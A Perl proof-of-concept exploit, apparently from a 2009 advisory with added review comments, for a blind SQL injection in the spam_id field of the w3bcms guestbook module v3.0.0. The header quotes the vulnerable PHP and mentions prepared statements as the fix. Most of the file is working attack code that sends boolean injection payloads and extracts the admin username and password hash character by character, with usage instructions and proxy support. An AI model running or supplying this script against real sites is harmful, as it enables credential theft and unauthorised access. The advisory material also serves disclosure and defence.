#!/usr/bin/perl
# Proof-of-concept for a blind (boolean-based) SQL injection in the
# w3bcms "Gaestebuch" (guestbook) module v3.0.0, as documented in the
# header below.  The script is a flat procedural program: option parsing
# and the main flow at file scope, followed by four subroutines that all
# share the file-scope LWP::UserAgent object `$ua`.
#
# NOTE(review): the file does not enable `use strict;` / `use warnings;`;
# a reviewer would add both as the first change.
#
# NOTE(review): this copy has been re-flowed from a whitespace-collapsed
# extraction.  Code tokens are unchanged; the padding inside the banner
# string literals may have been lost in extraction and is reproduced as
# found.
use LWP::UserAgent;
use HTTP::Request::Common qw(POST);
use Getopt::Long;
#
# \#'#/
# (-.-)
# ------------------oOO---(_)---OOo-----------------
# | __ __ |
# | _____/ /_____ ______/ /_ __ ______ ______ |
# | / ___/ __/ __ `/ ___/ __ \/ / / / __ `/ ___/ |
# | (__ ) /_/ /_/ / / / /_/ / /_/ / /_/ (__ ) |
# | /____/\__/\__,_/_/ /_.___/\__,_/\__, /____/ |
# | Security Research Division /____/ 2oo9 |
# --------------------------------------------------
# | w3bcms Gaestebuch v3.0.0 Blind SQL Injection |
# | (requires magic_quotes_gpc = Off) |
# --------------------------------------------------
# [!] Discovered.: DNX
# [!] Vendor.....: http://www.w3bcms.de
# [!] Detected...: 26.03.2009
# [!] Reported...: 29.03.2009
# [!] Response...: xx.xx.2009
#
# [!] Background.: CMS features in the frontend (vendor feature list,
#                  translated from German):
#   » Output of created pages
#   » Integrated secure spam protection (no captcha!)
#   » CMS features such as slogan rotation, date display, page view
#   » Integrated visitor counter (hidden/visible)
#   » Security against hacker attacks
#   » Fast database queries
#   » 100% search engine optimised (SEO)
#   » Extensible through modules & add-ons
#   » Supports mod_rewrite URLs (optional)
#
# [!] Bug........: $_POST['spam_id'] in includes/module/book/index.inc.php near line 42
#
# 37: } else if (isset($_GET['action']) && $_GET['action'] == "eintragen" && $modul_settings['aktiv'] == "0") {
# 38:
# 39: $_POST['spamschutz'] = mysql_real_escape_string($_POST['spamschutz']);
# 40: $_POST['spamschutz'] = strtolower($_POST['spamschutz']);
# 41:
# 42: $data = mysql_fetch_assoc(mysql_query("SELECT * FROM spamschutz WHERE id='".$_POST['spam_id']."' AND antwort='".$_POST['spamschutz']."'"));
#
# Root cause (from the quoted PHP): line 39 escapes `spamschutz` before
# it reaches the query on line 42, but `spam_id` is concatenated into the
# same query without any escaping or validation.  Mitigation on the
# application side is to treat `spam_id` the same way (validate it as an
# integer id, or escape it) or, better, to use a prepared statement so
# that neither value is ever interpolated into SQL text.
#
# [!] Solution...: no response from vendor but the vendor has updated the module package
#

# Print usage and stop unless at least three command-line words were
# given (e.g. `-2 -u URL`).  `$ARGV[2]` is the third element, so this is
# a crude argument-count check, not a validation of the options.
if(!$ARGV[2]) {
    print "\n \\#'#/ ";
    print "\n (-.-) ";
    print "\n ----------------oOO---(_)---OOo-----------------";
    print "\n | w3bcms Gaestebuch v3.0.0 Blind SQL Injection |";
    print "\n | coded by DNX |";
    print "\n ------------------------------------------------";
    print "\n[!] Usage: perl w3bcms.pl [Target] ";
    print "\n[!] Example: perl w3bcms.pl -2 -u \"http://127.0.0.1/w3b/index.php?seite=2.gaestebuch\"";
    print "\n[!] Targets:";
    print "\n -1 Get admin username";
    print "\n -2 Get admin password hash";
    print "\n[!] Options:";
    print "\n -u [url] URL to vuln website";
    print "\n -p [ip:port] Proxy support";
    print "\n";
    exit;
}

# Options: `-1` and `-2` are boolean flags, `-u` and `-p` take a string.
my %options = ();
GetOptions(\%options, "1", "2", "u=s", "p=s");

# File-scope user agent, shared by every subroutine below.
my $ua = LWP::UserAgent->new();

# The vulnerable code path is only reached with `action=eintragen` in the
# query string (PHP line 37 in the header), so it is appended here.  The
# script assumes `-u` already carries a `?`; nothing checks that.
my $target = $options{"u"}."&action=eintragen";

# Optional proxy.  Only the `http` scheme is routed through it, so an
# `https` target URL would bypass the proxy.
if($options{"p"}) {
    $ua->proxy('http', "http://".$options{"p"});
}

print "[!] Exploiting...\n";

# check_bug() exits the whole script if the marker is not found, so the
# target selection below only runs on a positive check.
check_bug($target);
if($options{"1"}) {
    get_username($target);
}
elsif($options{"2"}) {
    get_password($target);
}
print "\n[!] Exploit done\n";

# Send one request with an always-true condition in `spam_id` and look
# for the German text "Bitte geben Sie Ihren Namen an" ("please enter
# your name") in the response.  Presumably that is the guestbook's
# name-validation error, shown only once the spam-check query on PHP
# line 42 returned a row — confirm against the module source.  The same
# marker is the boolean oracle used by exploit().  Prints "vuln" or
# "not vuln"; on "not vuln" it calls `exit`, terminating the program.
# The numeric third argument of each syswrite is the byte length of the
# literal before it.
sub check_bug {
    my $url = shift;
    syswrite(STDOUT, "[!] Checking bug @ website: ", 28);
    my $inj = "' or 1=1/*";
    my $req = POST $url, [spam_id => $inj];
    my $res = $ua->request($req);
    if($res->content =~ /Bitte geben Sie Ihren Namen an/) {
        syswrite(STDOUT, "vuln", 4);
        print "\n";
    }
    else {
        syswrite(STDOUT, "not vuln", 8);
        exit;
    }
}

# Recover the `benutzername` column one character at a time: for each of
# positions 1..32, try byte values 32..126 (printable ASCII) until
# exploit() answers true, writing the matching character to STDOUT.
# If no value matches at a position, nothing is printed for it and the
# loop simply moves to the next position, so the output can be silently
# shorter than the real value.  Writes go through syswrite, i.e. they are
# unbuffered and appear as each character is found.
sub get_username {
    my $target = shift;
    syswrite(STDOUT, "[!] Get username: ", 18);
    for(my $i = 1; $i <= 32; $i++) {
        my $found = 0;
        my $h = 32;
        while(!$found && $h <= 126) {
            if(exploit($target, $i, $h, "benutzername")) {
                $found = 1;
                syswrite(STDOUT, chr($h), 1);
            }
            $h++;
        }
    }
}

# Same procedure for the `passwort` column, but the candidate set is the
# hexadecimal digits only: `$h` runs 48..57 ('0'..'9') and then jumps to
# 97..102 ('a'..'f').  The loop condition `($h <= 57 || $h <= 102)` is
# logically identical to `$h <= 102`; the first clause is redundant.
# 32 positions are read, which matches the length of a 32-hex-digit hash.
sub get_password {
    my $target = shift;
    syswrite(STDOUT, "[!] Get Hash: ", 14);
    for(my $i = 1; $i <= 32; $i++) {
        my $found = 0;
        my $h = 48;
        while(!$found && ($h <= 57 || $h <= 102)) {
            if(exploit($target, $i, $h, "passwort")) {
                $found = 1;
                syswrite(STDOUT, chr($h), 1);
            }
            if($h == 57) {
                $h = 97;
            }
            else {
                $h++;
            }
        }
    }
}

# One oracle query.
#   $url  - target URL (already carrying `action=eintragen`)
#   $i    - 1-based character position
#   $h    - candidate byte value
#   $c    - column name interpolated into the SQL
# Returns 1 when the response contains the marker text, else 0.
# From a defender's view the request shape is distinctive: a POST to the
# guestbook `eintragen` action whose `spam_id` field contains a quote,
# `substring(`, `CHAR(` and a `/*` comment terminator, repeated many
# times in quick succession.  Logging or filtering on the `spam_id`
# parameter would surface this traffic; the proper fix remains the
# prepared statement / input validation noted in the header.
sub exploit {
    my $url = shift;
    my $i = shift;
    my $h = shift;
    my $c = shift;
    my $inj = "' or 1=1 and substring((select ".$c." FROM admin limit 1),".$i.",1)=CHAR(".$h.")/*";
    my $req = POST $url, [spam_id => $inj];
    my $res = $ua->request($req);
    if($res->content =~ /Bitte geben Sie Ihren Namen an/) {
        return 1;
    }
    else {
        return 0;
    }
}